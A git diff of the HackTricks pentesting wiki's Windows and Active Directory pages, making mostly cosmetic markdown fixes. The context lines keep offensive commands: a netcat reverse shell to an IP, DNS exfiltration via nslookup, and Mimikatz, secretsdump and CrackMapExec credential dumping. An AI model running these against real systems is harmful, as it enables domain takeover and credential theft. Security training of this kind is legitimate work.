a/windows/active-directory-methodology/README.md b/windows/active-directory-methodology/README.md index 55284f7a..c895ef71 100644 --- a/windows/active-directory-methodology/README.md +++ b/windows/active-directory-methodology/README.md 
@@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} 
@@ -254,7 +254,7 @@ You can create you **own SSP** to **capture** in **clear text** the **credential It registers a **new Domain Controller** in the AD and uses it to **push attributes** (SIDHistory, SPNs...) on specified objects **without** leaving any **logs** regarding the **modifications**. You **need DA** privileges and be inside the **root domain**.\ Note that if you use wrong data, pretty ugly logs will appear.\ -[**More information about DCShadow here.**](dcshadow.md)\*\*\*\* +[**More information about DCShadow here.**](dcshadow.md) ## Forest Privilege Escalation - Domain Trusts diff --git a/windows/active-directory-methodology/acl-persistence-abuse.md b/windows/active-directory-methodology/acl-persistence-abuse.md index f5439b39..73faf19a 100644 --- a/windows/active-directory-methodology/acl-persistence-abuse.md +++ b/windows/active-directory-methodology/acl-persistence-abuse.md @@ -6,7 +6,7 @@ This lab is to abuse weak permissions of Active Directory Discretionary Access Control Lists (DACLs) and Acccess Control Entries (ACEs) that make up DACLs. -Active Directory objects such as users and groups are securable objects and DACL/ACEs define who can read/modify those objects (i.e change account name, reset password, etc). +Active Directory objects such as users and groups are securable objects and DACL/ACEs define who can read/modify those objects (i.e change account name, reset password, etc). An example of ACEs for the "Domain Admins" securable object can be seen here: @@ -261,7 +261,7 @@ Set-Acl -Path $path -AclObject $acl ## **Replication on the domain (DCSync)** The **DCSync** permission implies having these permissions over the domain itself: **DS-Replication-Get-Changes**, **Replicating Directory Changes All** and **Replicating Directory Changes In Filtered Set**.\ -[**Learn more about the DCSync attack here.**](dcsync.md)**** +[**Learn more about the DCSync attack here.**](dcsync.md) ## GPO Delegation 
@@ -279,7 +279,7 @@ The below indicates that the user `offense\spotless` has **WriteProperty**, **Wr ![](../../.gitbook/assets/a14.png) -****[**More about general AD ACL/ACE abuse here.**](acl-persistence-abuse.md)**** +[**More about general AD ACL/ACE abuse here.**](acl-persistence-abuse.md) ### Abusing the GPO Permissions diff --git a/windows/active-directory-methodology/ad-information-in-printers.md b/windows/active-directory-methodology/ad-information-in-printers.md index 899b9c65..567b1b80 100644 --- a/windows/active-directory-methodology/ad-information-in-printers.md +++ b/windows/active-directory-methodology/ad-information-in-printers.md @@ -12,7 +12,7 @@ Some blogs about the topic: * [https://www.ceos3c.com/hacking/obtaining-domain-credentials-printer-netcat/](https://www.ceos3c.com/hacking/obtaining-domain-credentials-printer-netcat/) * [https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856) -**The following information was copied from** [**https://grimhacker.com/2018/03/09/just-a-printer/**](https://grimhacker.com/2018/03/09/just-a-printer/)**** +**The following information was copied from** [**https://grimhacker.com/2018/03/09/just-a-printer/**](https://grimhacker.com/2018/03/09/just-a-printer/) ## LDAP settings diff --git a/windows/active-directory-methodology/asreproast.md b/windows/active-directory-methodology/asreproast.md index ac579c26..64f6d39f 100644 --- a/windows/active-directory-methodology/asreproast.md +++ b/windows/active-directory-methodology/asreproast.md 
@@ -47,4 +47,4 @@ Force **preauth** not required for a user where you have **GenericAll** permissi Set-DomainObject -Identity -XOR @{useraccountcontrol=4194304} -Verbose ``` -****[**More information about AS-RRP Roasting in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)**** +[**More information about AS-RRP Roasting in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat) diff --git a/windows/active-directory-methodology/bloodhound.md b/windows/active-directory-methodology/bloodhound.md index d1edc582..5aecdc52 100644 --- a/windows/active-directory-methodology/bloodhound.md +++ b/windows/active-directory-methodology/bloodhound.md @@ -95,7 +95,7 @@ If you wish to execute SharpHound using different credentials you can create a C runas /netonly /user:domain\user "powershell.exe -exec bypass" ``` -****[**Learn more about Bloodhound in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux)**** +[**Learn more about Bloodhound in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux) ### **Python** diff --git a/windows/active-directory-methodology/constrained-delegation.md b/windows/active-directory-methodology/constrained-delegation.md index 29995510..656d0b34 100644 --- a/windows/active-directory-methodology/constrained-delegation.md +++ b/windows/active-directory-methodology/constrained-delegation.md 
@@ -52,4 +52,4 @@ Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp. * Limit DA/Admin logins to specific services * Set "Account is sensitive and cannot be delegated" for privileged accounts. -****[**More information in ired.team.**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation)**** +[**More information in ired.team.**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation) diff --git a/windows/active-directory-methodology/custom-ssp.md b/windows/active-directory-methodology/custom-ssp.md index c688ed5b..3a4e5924 100644 --- a/windows/active-directory-methodology/custom-ssp.md +++ b/windows/active-directory-methodology/custom-ssp.md @@ -8,7 +8,7 @@ You can create you **own SSP** to **capture** in **clear text** the **credential #### Mimilib You can use the `mimilib.dll` binary provided by Mimikatz. **This will log inside a file all the credentials in clear text.**\ -****Drop the dll in `C:\Windows\System32\`\ +Drop the dll in `C:\Windows\System32\`\ Get a list existing LSA Security Packages: {% code title="attacker@target" %} diff --git a/windows/active-directory-methodology/dcshadow.md b/windows/active-directory-methodology/dcshadow.md index 463f1cab..d3901362 100644 --- a/windows/active-directory-methodology/dcshadow.md +++ b/windows/active-directory-methodology/dcshadow.md 
@@ -30,7 +30,7 @@ You can push the changes from a DA or from a user with this minimal permissions: * _DS-Install-Replica_ (Add/Remove Replica in Domain) * _DS-Replication-Manage-Topology_ (Manage Replication Topology) * _DS-Replication-Synchronize_ (Replication Synchornization) -* The **Sites object** (and its children) in the **Configuration container**: +* The **Sites object** (and its children) in the **Configuration container**: * _CreateChild and DeleteChild_ * The object of the **computer which is registered as a DC**: * _WriteProperty_ (Not Write) @@ -81,4 +81,4 @@ Notice that in this case you need to make **several changes,** not just one. So, -****[**More information about DCShadow in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1207-creating-rogue-domain-controllers-with-dcshadow)**** +[**More information about DCShadow in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1207-creating-rogue-domain-controllers-with-dcshadow) diff --git a/windows/active-directory-methodology/golden-ticket.md b/windows/active-directory-methodology/golden-ticket.md index ee253f59..98d576d6 100644 --- a/windows/active-directory-methodology/golden-ticket.md +++ b/windows/active-directory-methodology/golden-ticket.md @@ -32,4 +32,4 @@ Golden ticket events ID: * 4672: Admin Logon * `Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List –Property` -****[**More information about Golden Ticket in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets)**** +[**More information about Golden Ticket in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets) diff --git a/windows/active-directory-methodology/kerberos-authentication.md b/windows/active-directory-methodology/kerberos-authentication.md index 2c9724b5..58c8edfa 100644 
--- a/windows/active-directory-methodology/kerberos-authentication.md +++ b/windows/active-directory-methodology/kerberos-authentication.md @@ -1,6 +1,6 @@ # Kerberos Authentication -**This information was extracted from the post:** [**https://www.tarlogic.com/en/blog/how-kerberos-works/**](https://www.tarlogic.com/en/blog/how-kerberos-works/)**** +**This information was extracted from the post:** [**https://www.tarlogic.com/en/blog/how-kerberos-works/**](https://www.tarlogic.com/en/blog/how-kerberos-works/) ## Kerberos (I): How does Kerberos work? – Theory diff --git a/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md b/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md index a568504a..0b5d68d7 100644 --- a/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md +++ b/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md @@ -28,7 +28,7 @@ Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityRefer If you don't want to wait an hour you can use a PS script to make the restore happen instantly: [https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1](https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1) -****[**More information in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence)**** +[**More information in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence) ## Account Operators 
@@ -112,7 +112,7 @@ sc.exe \\dc01 stop dns sc.exe \\dc01 start dns ``` -****[**Learn more about this privilege escalation in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise) +[**Learn more about this privilege escalation in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise) ## **AD Recycle Bin** 
@@ -126,16 +126,16 @@ Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties * ## Group Managed Service Accounts (gMSA) - In most of the infrastructures, service accounts are typical user accounts with “**Password never expire**” option. Maintaining these accounts could be a real mess and that's why Microsoft introduced **Managed Service Accounts:** +In most of the infrastructures, service accounts are typical user accounts with “**Password never expire**” option. Maintaining these accounts could be a real mess and that's why Microsoft introduced **Managed Service Accounts:** -* No more password management. It uses a complex, random, 240-character password and changes that automatically when it reaches the domain or computer password expire date. +* No more password management. It uses a complex, random, 240-character password and changes that automatically when it reaches the domain or computer password expire date. * It is uses Microsoft Key Distribution Service (KDC) to create and manage the passwords for the gMSA. * It cannot be lock out or use for interactive login * Supports to share across multiple hosts * Can use to run schedule tasks (Managed service accounts do not support to run schedule tasks) * Simplified SPN Management – System will automatically change the SPN value if **sAMaccount** details of the computer change or DNS name property change. - gMSA accounts have their passwords stored in a LDAP property called _**msDS-ManagedPassword**_ which **automatically** get **resets** by the DC’s every 30 days, are **retrievable** by **authorized administrators** and by the **servers** who they are installed on. 
_**msDS-ManagedPassword**_ is an encrypted data blob called [MSDS-MANAGEDPASSWORD\_BLOB](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e) and it’s only retrievable when the connection is secured, **LDAPS** or when the authentication type is ‘Sealing & Secure’ for an example. +gMSA accounts have their passwords stored in a LDAP property called _**msDS-ManagedPassword**_ which **automatically** get **resets** by the DC’s every 30 days, are **retrievable** by **authorized administrators** and by the **servers** who they are installed on. _**msDS-ManagedPassword**_ is an encrypted data blob called [MSDS-MANAGEDPASSWORD\_BLOB](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e) and it’s only retrievable when the connection is secured, **LDAPS** or when the authentication type is ‘Sealing & Secure’ for an example. ![Image from https://cube0x0.github.io/Relaying-for-gMSA/](../../.gitbook/assets/asd1.png) @@ -237,7 +237,7 @@ PCWSTR pPathSourceReg = L"\\Registry\\User\\\\System\\CurrentControlSe The first one declares a string variable indicating where the vulnerable **Capcom.sys** driver is located on the victim system and the second one is a string variable indicating a service name that will be used (could be any service).\ Note, that the **driver must be signed by Windows** so you cannot load arbitrary drivers. But, **Capcom.sys** **can be abused to execute arbitrary code and is signed by Windows**, so the goal is to load this driver and exploit it. - Load the driver: +Load the driver: ```c #include "stdafx.h" diff --git a/windows/active-directory-methodology/resource-based-constrained-delegation.md b/windows/active-directory-methodology/resource-based-constrained-delegation.md index e635e210..1096c251 100644 --- a/windows/active-directory-methodology/resource-based-constrained-delegation.md 
+++ b/windows/active-directory-methodology/resource-based-constrained-delegation.md @@ -22,8 +22,8 @@ However, if the **TGS** used in **S4U2Proxy** is **NOT Forwardable** trying to a Suppose that the attacker has already **write equivalent privileges over the victim computer**. 1. The attacker **compromises** an account that has a **SPN** or **creates one** (“Service A”). Note that **any** _Admin User_ without any other special privilege can **create** up until 10 **Computer objects (**_**MachineAccountQuota**_**)** and set them a **SPN**. So the attacker can just create a Computer object and set a SPN. -2. The attacker configures **resource-based constrained delegation from Service A to the victim host**. -3. The attacker uses Rubeus to perform a **full S4U attack** (S4U2Self and S4U2Proxy) from Service A to Service B for a user **with privileged access to Service B**. +2. The attacker configures **resource-based constrained delegation from Service A to the victim host**. +3. The attacker uses Rubeus to perform a **full S4U attack** (S4U2Self and S4U2Proxy) from Service A to Service B for a user **with privileged access to Service B**. 1. S4U2Self (from the SPN compromised/created account): Ask for a **TGS of Administrator to me** (Not Forwardable). 2. S4U2Proxy: Use the **not Forwardable TGS** of the step before to ask for a **TGS** from **Administrator** to the **victim host**. 3. Even if you are using a not Forwardable TGS, as you are exploiting Resource-based constrained delegation, it will work. diff --git a/windows/active-directory-methodology/silver-ticket.md b/windows/active-directory-methodology/silver-ticket.md index 0d620f81..19f34fc1 100644 --- a/windows/active-directory-methodology/silver-ticket.md +++ b/windows/active-directory-methodology/silver-ticket.md 
@@ -40,7 +40,7 @@ Silver ticket events ID \(more stealth than golden ticket\): * 4634: Account Logoff * 4672: Admin Logon -\*\*\*\*[**More information about Silver Tickets in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets)\*\*\*\* +[**More information about Silver Tickets in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets) ## Available Services diff --git a/windows/active-directory-methodology/skeleton-key.md b/windows/active-directory-methodology/skeleton-key.md index 372c86d7..5c7db428 100644 --- a/windows/active-directory-methodology/skeleton-key.md +++ b/windows/active-directory-methodology/skeleton-key.md @@ -2,7 +2,7 @@ ## **Skeleton Key** -**From:** [**https://blog.stealthbits.com/unlocking-all-the-doors-to-active-directory-with-the-skeleton-key-attack/**](https://blog.stealthbits.com/unlocking-all-the-doors-to-active-directory-with-the-skeleton-key-attack/)**** +**From:** [**https://blog.stealthbits.com/unlocking-all-the-doors-to-active-directory-with-the-skeleton-key-attack/**](https://blog.stealthbits.com/unlocking-all-the-doors-to-active-directory-with-the-skeleton-key-attack/) There are several methods for compromising Active Directory accounts that attackers can use to elevate privileges and create persistence once they have established themselves in your domain. The Skeleton Key is a particularly scary piece of malware targeted at Active Directory domains to make it alarmingly easy to hijack any account. This malware **injects itself into LSASS and creates a master password that will work for any account in the domain**. Existing passwords will also continue to work, so it is very difficult to know this attack has taken place unless you know what to look for. 
@@ -18,11 +18,11 @@ Performing the attack is very straightforward to do. It only requires the follow ![Injecting a skeleton key using the misc::skeleton into a domain controller with Mimikatz](https://blog.stealthbits.com/wp-content/uploads/2017/07/1-3.png) -Here is an authentication for a Domain Admin member using the skeleton key as a password to get administrative access to a domain controller: +Here is an authentication for a Domain Admin member using the skeleton key as a password to get administrative access to a domain controller: ![Using the skeleton key as a password with the misc::skeleton command to get administrative access to a domain controller with the default password of Mimikatz](https://blog.stealthbits.com/wp-content/uploads/2017/07/2-5.png) -Note: If you do get a message saying, “System error 86 has occurred. The specified network password is not correct”, just try using the domain\account format for the username and it should work. +Note: If you do get a message saying, “System error 86 has occurred. The specified network password is not correct”, just try using the domain\account format for the username and it should work. ![Using the domain\account format for the username if you get a message saying System error 86 has occurred The specified network password is not correct](https://blog.stealthbits.com/wp-content/uploads/2017/07/3-3.png) diff --git a/windows/active-directory-methodology/unconstrained-delegation.md b/windows/active-directory-methodology/unconstrained-delegation.md index cc5a053d..72a2482f 100644 --- a/windows/active-directory-methodology/unconstrained-delegation.md +++ b/windows/active-directory-methodology/unconstrained-delegation.md 
@@ -6,7 +6,7 @@ This a feature that a Domain Administrator can set to any **Computer** inside th So if a domain admin logins inside a Computer with "Unconstrained Delegation" feature activated, and you have local admin privileges inside that machine, you will be able to dump the ticket and impersonate the Domain Admin anywhere (domain privesc). - You can **find Computer objects with this attribute** checking if the [userAccountControl](https://msdn.microsoft.com/en-us/library/ms680832\(v=vs.85\).aspx) attribute contains [ADS\_UF\_TRUSTED\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx). You can do this with an LDAP filter of ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’, which is what powerview does: +You can **find Computer objects with this attribute** checking if the [userAccountControl](https://msdn.microsoft.com/en-us/library/ms680832\(v=vs.85\).aspx) attribute contains [ADS\_UF\_TRUSTED\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx). You can do this with an LDAP filter of ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’, which is what powerview does: ```bash Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc 
@@ -18,7 +18,7 @@ kerberos::list /export #Another way Load the ticket of Administrator (or victim user) in memory with **Mimikatz** or **Rubeus for a** [**Pass the Ticket**](pass-the-ticket.md)**.**\ More info: [https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/)\ -[**More information about Unconstrained delegation in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation)**** +[**More information about Unconstrained delegation in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation) ### **Automatically compromising a Print server** @@ -32,7 +32,7 @@ To make a print server login against any machine you can use [**SpoolSample**](h ``` If the TGT if from a domain controller, you could perform a[ **DCSync attack**](acl-persistence-abuse.md#dcsync) and obtain all the hashes from the DC.\ -[**More info about this attack in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation)**** +[**More info about this attack in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation) ### Mitigation diff --git a/windows/authentication-credentials-uac-and-efs.md b/windows/authentication-credentials-uac-and-efs.md index 6a1d9ab2..2eee6294 100644 --- a/windows/authentication-credentials-uac-and-efs.md +++ b/windows/authentication-credentials-uac-and-efs.md 
@@ -8,16 +8,16 @@ The SSPI will be in charge of finding the adequate protocol for two machines tha ### Main SSPs -* **Kerberos**: The preferred one +* **Kerberos**: The preferred one * %windir%\Windows\System32\kerberos.dll -* **NTLMv1** and **NTLMv2**: Compatibility reasons +* **NTLMv1** and **NTLMv2**: Compatibility reasons * %windir%\Windows\System32\msv1\_0.dll -* **Digest**: Web servers and LDAP, password in form of a MD5 hash +* **Digest**: Web servers and LDAP, password in form of a MD5 hash * %windir%\Windows\System32\Wdigest.dll -* **Schannel**: SSL and TLS +* **Schannel**: SSL and TLS * %windir%\Windows\System32\Schannel.dll -* **Negotiate**: It is used to negotiate the protocol to use (Kerberos or NTLM being Kerberos the default one) - * %windir%\Windows\System32\lsasrv.dll +* **Negotiate**: It is used to negotiate the protocol to use (Kerberos or NTLM being Kerberos the default one) + * %windir%\Windows\System32\lsasrv.dll #### The negotiation could offer several methods or only one. 
@@ -149,9 +149,9 @@ Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10 #### UAC bypass exploits You could also use some tools to **bypass UAC like** [**UACME** ](https://github.com/hfiref0x/UACME)which is a **compilation** of several UAC bypass exploits. Note that you will need to **compile UACME using visual studio or msbuild**. The compilation will create several executables (like_Source\Akagi\outout\x64\Debug\Akagi.exe_) , you will need to know **which one you need.**\ -****You should **be careful** because some bypasses will **prompt some other programs** that will **alert** the **user** that something is happening. +You should **be careful** because some bypasses will **prompt some other programs** that will **alert** the **user** that something is happening. -**Empire** and **Metasploit** also have several modules to **bypass** the **UAC**. +**Empire** and **Metasploit** also have several modules to **bypass** the **UAC**. #### More UAC bypass 
@@ -182,9 +182,9 @@ Consists on watching if an **autoElevated binary** tries to **read** from the ** EFS works by encrypting a file with a bulk **symmetric key**, also known as the File Encryption Key, or **FEK**. The FEK is then **encrypted** with a **public key** that is associated with the user who encrypted the file, and this encrypted FEK is stored in the $EFS **alternative data stream** of the encrypted file. To decrypt the file, the EFS component driver uses the **private key** that matches the EFS digital certificate (used to encrypt the file) to decrypt the symmetric key that is stored in the $EFS stream. From [here](https://en.wikipedia.org/wiki/Encrypting\_File\_System). -Examples of files being decrypted without the user asking for it: +Examples of files being decrypted without the user asking for it: -* Files and folders are decrypted before being copied to a volume formatted with another file system, like [FAT32](https://en.wikipedia.org/wiki/File\_Allocation\_Table). +* Files and folders are decrypted before being copied to a volume formatted with another file system, like [FAT32](https://en.wikipedia.org/wiki/File\_Allocation\_Table). * Encrypted files are copied over the network using the SMB/CIFS protocol, the files are decrypted before they are sent over the network. The encrypted files using this method can be **tansparently access by the owner user** (the one who has encrypted them), so if you can **become that user** you can decrypt the files (changing the password of the user and logins as him won't work). @@ -196,7 +196,7 @@ Check if a **user** has **used** this **service** checking if this path exists:` Check **who** has **access** to the file using cipher /c \\ You can also use `cipher /e` and `cipher /d` inside a folder to **encrypt** and **decrypt** all the files -### Decrypting EFS files +### Decrypting EFS files #### Being Authority System diff --git a/windows/av-bypass.md b/windows/av-bypass.md index 66485f5a..215be0ec 100644 
--- a/windows/av-bypass.md +++ b/windows/av-bypass.md @@ -77,7 +77,7 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml ## Compiling our own reverse shell - https://medium.com/@Bank\_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15 +https://medium.com/@Bank\_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15 #### First C# Revershell diff --git a/windows/basic-cmd-for-pentesters.md b/windows/basic-cmd-for-pentesters.md index 9782546d..139ccc48 100644 --- a/windows/basic-cmd-for-pentesters.md +++ b/windows/basic-cmd-for-pentesters.md @@ -440,7 +440,7 @@ sudo tcpdump -i -A proto udp and dst port 53 and dst ip #Passi #### Victim -_**for /f tokens**_ \_\*\*\_technique: This allows us to execute commands, get the first X words of each line and send it through DNS to our server +_**for /f tokens**_ \_**\_technique: This allows us to execute commands, get the first X words of each line and send it through DNS to our server ```text for /f %a in ('whoami') do nslookup %a #Get whoami diff --git a/windows/checklist-windows-privilege-escalation.md b/windows/checklist-windows-privilege-escalation.md index ac908ac2..754aae2f 100644 --- a/windows/checklist-windows-privilege-escalation.md +++ b/windows/checklist-windows-privilege-escalation.md 
@@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} diff --git a/windows/ntlm/README.md b/windows/ntlm/README.md index 9bae2e5d..22fb7e78 100644 --- a/windows/ntlm/README.md +++ b/windows/ntlm/README.md 
@@ -110,7 +110,7 @@ This will launch a process that will belongs to the users that have launch mimik ### Pass-the-Hash from linux You can obtain code execution in Windows machines using Pass-the-Hash from Linux. \ -[**Access here to learn how to do it.**](broken-reference)**** +[**Access here to learn how to do it.**](broken-reference) ### Impacket Windows compiled tools @@ -171,10 +171,10 @@ wce.exe -s ::: ### Manual Windows remote execution with username and password -* ****[**PsExec**](psexec-and-winexec.md)**** -* [**SmbExec**](smbexec.md)**** -* ****[**WmicExec**](wmicexec.md)**** -* ****[**AtExec**](atexec.md)**** +* [**PsExec**](psexec-and-winexec.md) +* [**SmbExec**](smbexec.md) +* [**WmicExec**](wmicexec.md) +* [**AtExec**](atexec.md) ## Extracting credentials from a Windows Host @@ -190,4 +190,4 @@ wce.exe -s ::: ## Parse NTLM challenges from a network capture -**You can use** [**https://github.com/mlgualtieri/NTLMRawUnHide**](https://github.com/mlgualtieri/NTLMRawUnHide)**** +**You can use** [**https://github.com/mlgualtieri/NTLMRawUnHide**](https://github.com/mlgualtieri/NTLMRawUnHide) diff --git a/windows/ntlm/places-to-steal-ntlm-creds.md b/windows/ntlm/places-to-steal-ntlm-creds.md index 4d7ed02e..15890bcd 100644 --- a/windows/ntlm/places-to-steal-ntlm-creds.md +++ b/windows/ntlm/places-to-steal-ntlm-creds.md @@ -665,6 +665,6 @@ There might be many other ways in Windows. You never know! 🙂 ## References -* [**https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/**](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)\*\*\*\* +* [**https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/**](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/) * [https://attack.mitre.org/techniques/T1187/](https://attack.mitre.org/techniques/T1187/) 
diff --git a/windows/stealing-credentials/README.md b/windows/stealing-credentials/README.md index cd9b1d7f..8a12414e 100644 --- a/windows/stealing-credentials/README.md +++ b/windows/stealing-credentials/README.md @@ -112,7 +112,7 @@ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds #~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss ``` -### Dump the NTDS.dit password history from target DC +### Dump the NTDS.dit password history from target DC ``` #~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history @@ -238,7 +238,7 @@ secretsdump.py -just-dc-ntlm /@ For **big NTDS.dit files** it's recommend to extract it using [gosecretsdump](https://github.com/c-sto/gosecretsdump). -Finally, you can also use the **metasploit module**: _post/windows/gather/credentials/domain\_hashdump_ or **mimikatz** `lsadump::lsa /inject` +Finally, you can also use the **metasploit module**: _post/windows/gather/credentials/domain\_hashdump_ or **mimikatz** `lsadump::lsa /inject` ## Lazagne @@ -279,4 +279,4 @@ Download it from:[ http://www.tarasco.org/security/pwdump\_7](http://www.tarasco ## Defenses -****[**Learn about some credentials protections here.**](credentials-protections.md)**** +[**Learn about some credentials protections here.**](credentials-protections.md) diff --git a/windows/stealing-credentials/credentials-mimikatz.md b/windows/stealing-credentials/credentials-mimikatz.md index e105d069..29fbc8b4 100644 --- a/windows/stealing-credentials/credentials-mimikatz.md +++ b/windows/stealing-credentials/credentials-mimikatz.md 
